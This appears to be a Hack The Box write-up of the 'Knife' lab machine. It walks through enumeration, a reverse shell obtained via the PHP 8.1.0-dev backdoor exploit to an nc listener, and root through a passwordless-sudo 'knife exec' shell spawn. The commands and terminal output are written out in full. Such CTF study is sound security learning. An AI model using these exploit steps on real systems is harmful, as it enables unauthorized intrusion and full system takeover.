on
HTB - Knife
I’ve just completed Knife from HTB! In my opinion, Knife is a rather straight forward box that makes use of existing backdoors. Here’s a quick writeup on how I solved this box.
HTB - Knife
Box : Knife
IP Address : 10.10.10.242
Operating System : Linux
Remarks
- Google is your best friend!
- Also not to forget,
exploitdb:)
Enumeration
As usual, we will first start off with our normal Nmap scans to identify the possible open ports and the operating systems behind each port. This box is quite simple, with only 2 open ports - 22 and 80.
Port 22 belongs to an SSH server, while port 80 belongs to a web server running on Apache 2.4.41 (Ubuntu)
Visiting the web server does not yield any interesting results providing hints to any exploitable vulnerabilities. So, we will go on to scan the website with Nikto, which uncovered an interested information that the web server has an x-powered-by header of PHP/8.1.0-dev
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
Exploitation
The first step that I took was to try to exploit the Apache/2.4.41 by searching for vulnerabilities related to it. CVE 2020-1927 was found to be the most promising exploit related to it, but unfortunately I was unable exploit it on the website (LIFE OF A SAD HTB PLAYER IN A NUTSHELL….)
The second step that I tried was to look for potential exploits for PHP/8.1.0-dev. This time though, I was able to find potential exploits on this repository. This repository provided 2 different exploits, namely a reverse shell exploit and a RCE exploit. For this case, I choose to do a reverse shell exploit first but thankfully it worked!! (Actually I was just lazy and just took a random exploit to try it out XD)
git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce.git
mv revshell_php_8.1.0-dev.py exploit_revshell.py
Now, all that is left is for us to first open a listener on the attacker’s machine using nc -nlvp 3000 and execute the exploit script on the victim’s machine using python3 exploit_revshell.py http://10.10.10.242 <Your IP address> 3000
Now, we have successfully obtained a reverse shell! So what’s next? Of course, we have to stabilize the shell :-)
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 3000
listening on [any] 3000 ...
connect to [10.10.16.250] from (UNKNOWN) [10.10.10.242] 48826
bash: cannot set terminal process group (1036): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
james@knife:/$ cd home
cd home
Obtaining user flag
Now, all that is left for us is to obtain the user flag! Easy Peezy
james@knife:/home$ ls
ls
james
james@knife:/home$ cd james
cd james
james@knife:~$ ls
ls
user.txt
james@knife:~$ cat user.txt
cat user.txt
Obtaining system/root flag
Wait! But we are not done with the machine yet! There is still another system flag yet to be discovered.
So, let’s run sudo -l to check for the permissions. What we noticed was that /usr/bin/knife can be executed with root privileges, without the need for any password :o
james@knife:~$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
But, here comes the problem - What exactly is this /usr/bin/knife? So, a very quick google search tells me that /usr/bin/knife belongs to an open-source repository which serves as an infrastructure server.
So now comes the next question - How can /usr/bin/knife be exploited? Fortunately, the answer lies in the documentation of knife. Reading the documentation, I discovered that there is a knife exec command that allows me to execute scripts using knife. This could potentially allow us to obtain a root shell.
Now, lets put our theory to the test! And, it worked! All we have to do is to stabilize the shell and obtain the system flag.
james@knife:~$ sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"
sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"
# python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@knife:/home/james# cd /root
cd /root
root@knife:~# ls
ls
delete.sh root.txt snap
root@knife:~# cat root.txt
cat root.txt